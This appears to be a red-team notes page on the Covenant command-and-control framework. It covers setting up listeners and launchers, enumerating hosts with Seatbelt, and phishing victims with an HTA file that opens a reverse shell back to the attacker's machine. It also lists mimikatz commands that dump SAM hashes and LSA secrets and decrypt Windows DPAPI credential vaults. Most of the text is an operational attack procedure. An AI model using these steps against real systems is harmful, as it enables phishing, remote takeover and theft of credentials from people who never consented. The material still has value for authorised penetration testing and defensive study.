Covenant
Installation
Install Dotnet
Install and launch Covenant
Navigate to https://127.0.0.1:7443 set up your user and you should be good to go
Start a listener
Create a Launcher to get a shell
Once the powershell code used you see a grunt has popped
Launchers type
Binary
Generates a custom binary to launch grunt, does not rely on a system binary.Shellcode
Converts binary to shellcode using donutPowerShell
Generates PowerShell code to launch a grunt using powershell.exe.MSBuild
Generates an MSBuild XML file to launch a grunt using msbuild.exeInstallUtil
Generates an InstallUtil XML file to launch a grunt using installutil.exeMshta
Generates an HTA file to launch a grunt using mshta.exeRegsrv32
Generates an SCT file to launch a grunt using regsrv32.exeWmic
Generates an XSL file to launch a grunt using wmic.exeCscript
Generate a JScript file to launch a grunt using cscript.exeWscript
Generate a JScript file to launch a grunt using wscript.exe
Local Enumeration
Suppose we have a grunt (a shell on the target) so we want to enumerate the target
Click on the grunt > Interact
Use Seatbelt
Seatbelt -group=all
We will get useful info: local users, dns info (such as email domain and all), interesting files, etc.
Use the cmd
GetDomainUser
to enumerate domain usersUse the cmd
GetNetLoggedOnUser
to have a list of logged on usersUse the cmd
GetNetLocalGroup
to have a list of local groupetc.
hta Email Phishing
Create and hta file in your attacking machine:
Create an HTTP listener in Covenant
Listener > create
The table in listener should look like this
Name ListenerType Status StartTime ConnectAddresses ConnectPort HTTP Listener
HTTP
Active
3/7/2022 8:28:13 PM
IP-OF-ATTACK-MACHINE
80
Go to Launchers > Powershell
Fill up the info, be careful taht the killdate is later in the future (not in the past)
Click on generate
Copy the encoded Launcher and put it in the script above instead of
<powershell command here>
Save the script
Go back to Listerners click on the listener that was just set up
Go to Hosted Files, in Path enter
/name-of-your-script.hta
Click on Browse and select your script
And click on create
If we go to
http://localhost/name-of-your-script.hta
we should be able to download it
We can now send an email with a link to our reverse shell
http://IP-OF-ATTACK-MACHINE/name-of-your-script.hta
When the user will click the link an run the script we will get our reverse shell
If we go to Covenant again and check in Grunt we should have a new one
If you are not able to execute command (they stay Uninitialized) try either of those:
Verify the kill date of the launcher
the UI may not allow changing the date. This can be fixed by deleting the
/opt/Covenant/Covenant/data/covenant.db
file and restarting the service. You will lose all data and need to create a new user to log in with.
Dump hashes with mimikatz
In a high grunt
We can use this to see if any plaintext info might come out
Mimikatz token::elevate lsadump::secrets
Will dump the sam file (where password hashes are stored in windows)
Mimikatz token::elevate lsadump::sam
Covenant will save the Crendentials in the Data section as well
Cracking Credential Vault with mimikatz
We need a medium integrity grunt
mimikatz vault::cred
will show all services with persisted passwordsls C:\users\user\appdata\local\microsoft\credentials
will list the passwords files the smallest of the files is gemerally the one we need.We then go to the tab tak in our grunt. We select Mimikatz from the list and type this task:
"dpapi::cred /in:C:\users\user\appdata\local\microsoft\credentials\FILE-PREVIOUSLY-CHOSEN"
From the output of the task we need to keep aside the value of the guidMasterKey
ls C:\users\user\appdata\roaming\microsoft\protect
this should list a directory with an sid value in the endIf you do an ls on this it should list the same path with the guidMasterKey value we previously found. We need to copy the full path, and then we go to task again and using mimikatz we need to type
"dpapi::masterkey /in:C:\users\user\appdata\roaming\microsoft\protect\sid\guidMasterKey /rpc"
This way we will het in the end of the output the key for the domain controller which should look like this:
key : 60f202bff3c6e2eaedfc4c28ac1adbdd102ec7dba401157f6f8c2056205507ed4e6d93120ebe48959751c0f2c939e515382d7ffec7bd2b129c8eb89466b31f0f
We need to keep this key aside
We go back to task and we type `"dpapi::cred /in:C:\users\user\appdata\local\microsoft\credentials\sid /masterkey:"
This should dump the domain password, you should see it at the end of the output:
Common issues with Covenant
Issue - The dashboard is acting weird and not allowing the creation of listeners, payloads, etc.
Solution - Delete /opt/Covenant/Covenant/data/Covenant.db and restart Covenant.
Issue - I can get a Grunt to connect back to Covenant, but when attempting to run commands it just sits on uninitialized and doesn't execute.
Solution - This is likely an issue with the Grunt kill date. It's your responsibility to pay attention to the kill date in the launcher generator to ensure it is a date and time in the future. In rare circumstances the UI may not allow changing the date. This can be fixed by deleting the
/opt/Covenant/Covenant/data/Covenant.db
file and restarting the service. Note you will lose all data and need to create a new user to log in with. This is a known issue with Covenant.
Resources
Last updated